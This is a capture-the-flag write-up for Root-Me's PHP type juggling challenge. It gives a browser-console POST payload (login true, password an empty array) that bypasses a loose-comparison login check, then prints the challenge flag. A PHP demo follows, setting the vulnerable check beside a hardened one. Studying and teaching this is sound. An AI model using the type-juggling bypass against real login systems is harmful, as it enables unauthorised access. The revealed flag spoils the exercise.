//www.root-me.org/en/Challenges/Web-Server/PHP-type-juggling
[Problem]
Get an access.
//challenge01.root-me.org/web-serveur/ch44/
[POC]
Right-click, choose Inspect Element, copy the data below, paste it into the Console and hit Enter.
```javascript
// Same request the challenge page sends, but with a non-string password.
var data = {'login':true, 'password':[]}
$.ajax({
    type: "POST",
    dataType: "json",
    url: "auth.php",
    data: {auth : JSON.stringify({data})},
    success: function(data) {
        $(".return-value").html(
            "Result: " + data['status']
        );
    }
});
```
Click the Network tab, select auth.php at the bottom left, then click Preview:
Warning: strcmp() expects parameter 1 to be string, array given in /challenge/web-serveur/ch44/auth.php on line 18 {"status":"Access granted! The validation password is: DontForgetPHPL00seComp4r!s0n!!"}
# FLAG = DontForgetPHPL00seComp4r!s0n!!
Well done, you won 30 Points
Root-me.org
PHP Type juggling
PHP loose comparison
In this challenge we need to find a way to log in. The title gives us an easy hint about what we need to abuse.
We even get access to the source code.
If we take a look at the resource that root-me gave us, we get a pretty good idea how we are going to do this. I’ll put two links worth reading concerning this exploit.
//www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf
//turbochaos.blogspot.ca/2013/08/exploiting-exotic-bugs-php-type-juggling.html
There is also this link, a grid showing how each type compares against every other type.
//docs.google.com/spreadsheets/d/1oWsmTvEZcfgc_1QkBczNGA3Gcffg_pmgKcak7iZldUw/pub?output=html
//php.net/manual/en/types.comparisons.php
So, to keep this short: the "==" operator compares values very loosely.
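The warning in the POC above and the loose-comparison point here come down to the same two PHP behaviours: `true == "admin"` is true, and on PHP 7 and earlier `strcmp()` given an array returns NULL with a warning, and `NULL == 0` is true. The following is an added example, not the challenge's auth.php (whose source is not reproduced on this page); the check shape, the constant name and the placeholder secret are assumptions. It runs the page's exact payload against a vulnerable check and a hardened one.

```php
<?php
// Added example; not the challenge's own auth.php, whose source is not on this page.
// It models the class of check the warning above points to, beside a hardened version.

// Constructed stand-in for the server-side secret (the real value is not known here).
const EXPECTED_PASSWORD = 'placeholder-secret';

// Vulnerable pattern (assumed shape, consistent with the page's payload):
//  - `==` lets the boolean true match the string "admin";
//  - strcmp() given an array returns NULL with a warning on PHP 7 and earlier,
//    and NULL == 0 is true, so the password check "passes".
// PHP 8 throws a TypeError here instead; it is caught so the demo runs on both.
function vulnerable_check(array $data): bool
{
    try {
        return $data['login'] == 'admin'
            && strcmp($data['password'], EXPECTED_PASSWORD) == 0;
    } catch (TypeError $e) {
        return false; // PHP 8: the call fails instead of being coerced
    }
}

// Hardened pattern: reject anything that is not a string before comparing,
// use strict identity for the username and a constant-time comparison for
// the password, so no value is ever coerced.
function hardened_check(array $data): bool
{
    $login    = $data['login']    ?? null;
    $password = $data['password'] ?? null;
    if (!is_string($login) || !is_string($password)) {
        return false;
    }
    return $login === 'admin' && hash_equals(EXPECTED_PASSWORD, $password);
}

// Constructed inputs in the shape auth.php receives (decoded JSON), including
// the exact payload used in the write-up above.
$payloads = [
    'page payload'   => '{"login":true,"password":[]}',
    'wrong password' => '{"login":"admin","password":"guess"}',
    'right password' => '{"login":"admin","password":"placeholder-secret"}',
];

foreach ($payloads as $label => $json) {
    $data = json_decode($json, true);
    printf("%-15s vulnerable=%-7s hardened=%s\n", $label,
        vulnerable_check($data) ? 'granted' : 'denied',
        hardened_check($data)   ? 'granted' : 'denied');
}
```

On PHP 7 the first row prints `vulnerable=granted hardened=denied` (with the same `strcmp()` warning as in the POC); on PHP 8 the vulnerable check is denied by the TypeError rather than by design. The hardened version is correct on both, because the type check happens before any comparison and `hash_equals()` only ever sees two strings.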
If we take a look at the source code we’ll notice the following.